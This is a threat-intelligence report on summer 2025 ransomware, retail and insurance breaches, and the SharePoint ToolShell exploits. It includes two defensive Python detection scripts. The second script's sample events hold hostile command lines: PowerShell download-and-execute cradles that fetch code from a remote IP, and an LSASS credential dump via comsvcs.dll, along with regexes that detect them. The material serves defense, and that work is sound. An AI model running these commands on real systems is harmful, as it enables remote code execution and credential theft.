Report: The Heat Wasn’t Just Outside; Cyber Attacks Spiked in Summer 2025
Summer 2025 was a season of unprecedented cyberattacks. Ransomware hammered hospitals, retail giants suffered data breaches, insurance firms were hit by phishing, and nation-state actors launched disruptive campaigns. From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers kept defenders on their heels. This report breaks down the season’s most high-impact incidents and what security teams need to do before the next wave hits.
Summer Exposes Healthcare’s Growing Ransomware Risk
Hospitals can’t afford downtime, and attackers know it. This summer, ransomware groups targeted healthcare, exploiting both the value of patient data and the urgency of care.
- Interlock Rises as a Major Threat to US Healthcare: A July 22, 2025, joint advisory by CISA, the FBI, HHS, and MS-ISAC highlighted Interlock as a major threat to the Healthcare and Public Health (HPH) sector. The group is linked to around 14 incidents in 2025 alone, roughly a third of them healthcare providers. What sets Interlock apart is its use of “FileFix,” a social-engineering launcher that gets the victim to paste a PowerShell command into the File Explorer address bar, disguised behind a decoy file path. Because the payload is run by the user from a trusted process rather than dropped as a script file or attachment, it slips past detections keyed on malicious downloads. The advisory also noted drive-by downloads from compromised legitimate websites, use of tools like Cobalt Strike, and an unusual ransom process in which no demand is delivered up front and the victim must initiate contact.
- Rhysida Ransomware Targeted Another US Healthcare Center: On July 8, 2025, the Rhysida ransomware group allegedly leaked sensitive data from Florida Hand Center, including medical images, driver’s licenses, and insurance forms. The clinic was given just seven days to respond before the release.
- Qilin Recycles Scattered Spider Playbook in Wave of Healthcare Breaches: In June 2025, Qilin was the most active ransomware group, with 81 claimed victims, 52 of them in the healthcare sector. The group gained access through unpatched Fortinet devices (CVE-2024-21762, an out-of-bounds write in the FortiOS SSL VPN, and CVE-2024-55591, an authentication bypass in FortiOS and FortiProxy), then exfiltrated electronic health records and insurance data before deploying ransomware. To maximize pressure, Qilin added legal-themed extortion features such as a “Call Lawyer” option and automated negotiation tools to push victims toward faster payouts. These cases show how heavily a breach of health data weighs under HIPAA and state data-protection laws.
Major Brands Breached in Retail Cybercrime Wave
The retail sector couldn’t escape the wave of cyberattacks sweeping through Summer 2025.
- Louis Vuitton Breach Marks Third in a Quarter: On July 2, 2025, Louis Vuitton UK suffered a data breach exposing customer contact information and purchase history. It was the third breach of an LVMH brand in three months, after Dior and Louis Vuitton Korea. Days later, on July 10, UK police arrested four suspects tied to the high-profile attacks on M&S, Co-op, and Harrods. The group is allegedly linked to Scattered Spider, an English-speaking threat actor with members in the UK and US that is known for social engineering and for working with ransomware operators like DragonForce, a sign of the growing impact of homegrown cybercriminals on major retailers.
- DragonForce Hits US Retail Chain Belk: Between May 7 and 11, 2025, on the other side of the Atlantic, North Carolina-based retailer Belk suffered a data breach. DragonForce claimed responsibility, stating it exfiltrated 156 GB of customer and employee data, including names, Social Security numbers, emails, and HR files, which were later posted on its leak site after ransom negotiations stalled.
- Scattered Spider’s Tactics Shifted from Retail to Insurance: Scattered Spider (UNC3944), a native English-speaking cybercriminal collective, used identity-centric social engineering, voice phishing, MFA fatigue, and help-desk impersonation to breach UK retailers (M&S, Co-op, Harrods) in April–May 2025. In mid-June 2025, the group shifted to US insurance firms. Aflac detected and contained unauthorized access on June 12, 2025, with customer and employee personal data (SSNs, health claims) allegedly compromised. Erie Insurance and Philadelphia Insurance Companies reported similar disruptions, highlighting the industry’s exposure to identity-centric attacks. Beyond the operational damage, insurers holding this data answer to state privacy laws such as the CCPA and to the National Association of Insurance Commissioners (NAIC) data security requirements adopted by state regulators.
State-Sponsored and Geopolitical Cyber Activity
Not all cyber threats this summer were about money. Nation-state hackers and hacktivists also made their mark, using the turbulent geopolitical climate to launch attacks.
- Pro-Israel Hacktivist Group Predatory Sparrow Hits Iran: In mid-June 2025, days after the Israel–Iran conflict began, the pro-Israel hacktivist group Predatory Sparrow claimed an attack on Iran’s Bank Sepah that disrupted banking services, and the following day claimed to have breached the Nobitex crypto exchange and destroyed roughly $90M in assets by sending tokens to burn wallets that nobody can spend from.
- Iran Threatens Cyber Retaliation: After DHS warned of a heightened threat environment in a June 22, 2025, National Terrorism Advisory System bulletin, CISA, the FBI, NSA, and DC3 published a joint fact sheet on June 30 warning that Iranian-affiliated actors might target vulnerable US networks, operational technology, and other critical infrastructure. These alerts are a reminder that cyber conflict is now a frontline extension of geopolitical tension, and that its effects ripple far beyond the borders and sectors where it starts.
Key Vulnerabilities Gaining Public Attention
Multiple Microsoft SharePoint vulnerabilities were exploited this summer in a widespread cyber espionage campaign known as ToolShell.
- CVE-2025-53770 is a critical (CVSS 9.8) deserialization flaw that lets unauthenticated attackers run arbitrary code on on-prem SharePoint Server 2016, 2019, and Subscription Edition; SharePoint Online was not affected. Threat actors used it to drop a web shell (spinstall0.aspx) that reads the server’s ASP.NET machine keys, which lets them forge signed __VIEWSTATE payloads and keep executing code even on a patched server unless the keys are rotated. From there they stole credentials and moved laterally through enterprise networks. CISA added the bug to its KEV catalog on July 20, 2025, and Microsoft shipped out-of-band updates over the following days.
- CVE-2025-49704 and CVE-2025-49706 were the original pair: a code-injection flaw and a spoofing (authentication bypass) flaw, chained together, that Microsoft fixed in the July 2025 Patch Tuesday release. CVE-2025-53770 bypasses that fix, which is why servers that had applied only the July updates were still compromised. CISA later added both earlier CVEs to the KEV catalog as well.
- The ToolShell campaign targeted organizations across the US, Europe, and the Middle East, including government agencies, energy firms, and telecom providers. The exploit chain had been demonstrated at Pwn2Own Berlin in May 2025, and security researchers assess that attackers reverse-engineered Microsoft’s July Patch Tuesday fixes to develop the bypass tracked as CVE-2025-53770.
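The hunt below is an added example, not code from the original report or from Microsoft. It scans constructed IIS W3C log lines for the two ToolShell indicators that Microsoft and CISA published: an initial-access POST to /_layouts/15/ToolPane.aspx with DisplayMode=Edit and a Referer of /_layouts/SignOut.aspx, and any later request for the spinstall0.aspx web shell (Microsoft also reported spinstall1.aspx and spinstall2.aspx variants). The field layout, timestamps, and IP addresses in the sample are constructed for illustration; point it at your real u_ex*.log files to use it.

```python
"""Hunt IIS W3C logs for the publicly reported ToolShell request pattern.

Added example. The log excerpt below is constructed, not real data; the
request pattern and web-shell file name are the indicators Microsoft and
CISA published for the ToolShell campaign (CVE-2025-53770).
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed IIS log excerpt. Line 1 is benign; line 2 matches the ToolShell
# initial-access request; line 3 is a follow-up fetch of the dropped web shell.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-18 22:14:03 GET /_layouts/15/start.aspx - 10.0.0.5 Mozilla/5.0 https://sp.example.local/ 200
2025-07-18 22:15:41 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 203.0.113.7 Mozilla/5.0 /_layouts/SignOut.aspx 200
2025-07-18 22:16:02 GET /_layouts/15/spinstall0.aspx - 203.0.113.7 Mozilla/5.0 - 200
"""

# Web shell names reported by Microsoft: spinstall0.aspx and numbered variants.
WEBSHELL_RE = re.compile(r"/spinstall\d*\.aspx$", re.I)


@dataclass
class Finding:
    client_ip: str
    rule: str
    request: str


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed record; skip rather than misalign
        yield dict(zip(fields, values))


def hunt_toolshell(text):
    """Return findings for records matching the ToolShell indicators."""
    findings = []
    for rec in parse_w3c(text):
        method = rec.get("cs-method", "").upper()
        stem = rec.get("cs-uri-stem", "").lower()
        query = rec.get("cs-uri-query", "")
        referer = rec.get("cs(Referer)", "").lower()
        params = parse_qs(query) if query != "-" else {}
        display_modes = [v.lower() for v in params.get("DisplayMode", [])]

        # Indicator 1: POST to ToolPane.aspx in edit mode, referred from SignOut.aspx.
        if (method == "POST" and "/_layouts/" in stem
                and stem.endswith("/toolpane.aspx")
                and "edit" in display_modes
                and referer.endswith("/_layouts/signout.aspx")):
            findings.append(Finding(rec["c-ip"], "toolshell_toolpane_post",
                                    f"{method} {stem}?{query}"))
        # Indicator 2: any request for the spinstall web shell.
        elif WEBSHELL_RE.search(stem):
            findings.append(Finding(rec["c-ip"], "spinstall_webshell_access",
                                    f"{method} {stem}"))
    return findings


if __name__ == "__main__":
    for f in hunt_toolshell(SAMPLE_LOG):
        print(f"{f.rule:28} {f.client_ip:15} {f.request}")
```

A hit on the web shell means the server’s ASP.NET machine keys must be treated as stolen: patching alone does not evict an attacker who can sign __VIEWSTATE, so rotate the keys and restart IIS after applying the update.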
What to Take Away from the Summer Wildfires in Cybersecurity
From hospitals to retail giants and insurance providers to nation-states, the season exposed cracks in even the most fortified environments. Here’s what security teams should do next.
- Patch Like Your Life Depends on It: Start with CISA KEV entries and high-severity CVEs, but don’t stop there. Validate whether each CVE is actually exploitable in your environment and focus on exploit chains, not just individual scores.
- Harden Identity as Your New Perimeter: Social engineering worked better than malware this summer. Stop MFA fatigue attacks, reinforce help-desk verification, and limit privileged access.
- Train Your Humans: Run regular simulations, update phishing scenarios, and prepare high-risk roles for real-world lures. Threat actors like Scattered Spider didn’t exploit a CVE; they exploited a person.
- Watch for Post-Initial Access Activity: Threat actors like Interlock and Qilin didn’t just drop ransomware; they moved laterally, staged data, and evaded detection. Implement behavioral monitoring for techniques such as PowerShell abuse, credential theft, and stealthy data exfiltration.
- Don’t Ignore Legacy Systems: The ToolShell campaign exploited unpatched on-prem SharePoint servers, many of them on outdated builds, though fully supported versions (2016, 2019, and Subscription Edition) were exploitable too until Microsoft’s out-of-band updates shipped. Isolate what you can’t upgrade, monitor what you can’t patch, and replace what you’ve ignored.
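The following is an added example, not code from the original report or from any advisory, that turns the behavioral-monitoring advice above and the FileFix description in the healthcare section into concrete detection logic over constructed process-creation events (Sysmon Event ID 1-style fields). A shell spawned by explorer.exe whose command line carries a trailing “# C:\…” decoy path is the FileFix lure as publicly described; encoded commands are base64/UTF-16LE decoded and scanned for download cradles; and a comsvcs.dll MiniDump call is flagged as LSASS credential dumping. The event objects, scores, and threshold are assumptions for illustration.

```python
"""Score process-creation events for PowerShell abuse and credential dumping.

Added example. Events are constructed; field names mirror Sysmon Event ID 1
(ParentImage, Image, CommandLine). Scores and threshold are illustrative.
"""
import base64
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    image: str
    score: int
    reasons: list = field(default_factory=list)


SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# In-memory execution and download-cradle keywords common to PowerShell loaders.
CRADLE_RE = re.compile(r"(\biex\b|invoke-expression|downloadstring|downloadfile|"
                       r"invoke-webrequest|\biwr\b|net\.webclient|frombase64string)", re.I)
# -EncodedCommand and its short forms, followed by a base64 blob.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# FileFix: a command pasted into the Explorer address bar, then '#' and a decoy
# file path so the bar looks like an ordinary path to the user.
FILEFIX_RE = re.compile(r"#\s*[A-Za-z]:\\")
# LSASS dump via rundll32 comsvcs.dll MiniDump.
LSASS_DUMP_RE = re.compile(r"comsvcs\.dll.*minidump", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return None


def score_event(ev):
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    cmd = ev.command_line
    score, reasons = 0, []
    if image in SHELLS:
        if parent == "explorer.exe" and FILEFIX_RE.search(cmd):
            score += 5
            reasons.append("filefix: shell launched from Explorer with '# <path>' decoy")
        if re.search(r"-(?:w|win|windowstyle)\s+hidden", cmd, re.I):
            score += 1
            reasons.append("hidden window")
        if (re.search(r"-(?:nop|noprofile)\b", cmd, re.I)
                or re.search(r"-(?:ep|exec|executionpolicy)\s+bypass", cmd, re.I)):
            score += 1
            reasons.append("profile/execution-policy evasion flags")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            score += 2
            reasons.append("encoded command")
            cmd = cmd + " " + decoded  # scan the decoded payload as well
        if CRADLE_RE.search(cmd):
            score += 3
            reasons.append("download cradle / in-memory execution")
    if LSASS_DUMP_RE.search(cmd):
        score += 5
        reasons.append("lsass dump via comsvcs.dll MiniDump")
    return Alert(image, score, reasons)


def detect(events, threshold=4):
    """Return alerts for events whose cumulative score reaches the threshold."""
    return [a for a in (score_event(e) for e in events) if a.score >= threshold]


# Constructed sample events: one benign, one FileFix-style, one encoded
# cradle launched from Word, one LSASS dump.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (iwr http://198.51.100.9/s.ps1)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -w hidden -c "iex (New-Object Net.WebClient).DownloadString('
                 r"'http://198.51.100.9/a.txt')\" # C:\Users\Public\Documents\Invoice_Q3.pdf"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -enc {ENCODED_PAYLOAD}"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a.image, a.score, "; ".join(a.reasons))
```

The scoring is deliberately additive: a single hidden-window flag on its own is noise, but a shell spawned by Explorer with a decoy path, a cradle, and a hidden window should page someone. Tune the threshold against a week of your own process telemetry before enabling alerts.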
Need Further Assistance?
If you have any further questions regarding this report, suspect your organization’s sensitive information may have been compromised, or require advanced cyber threat intelligence and dark web monitoring services, you are encouraged to use the ‘Ask to Analyst’ feature to consult a real expert, contact Brinztech directly, or, if you find the information irrelevant, open a support ticket for additional assistance.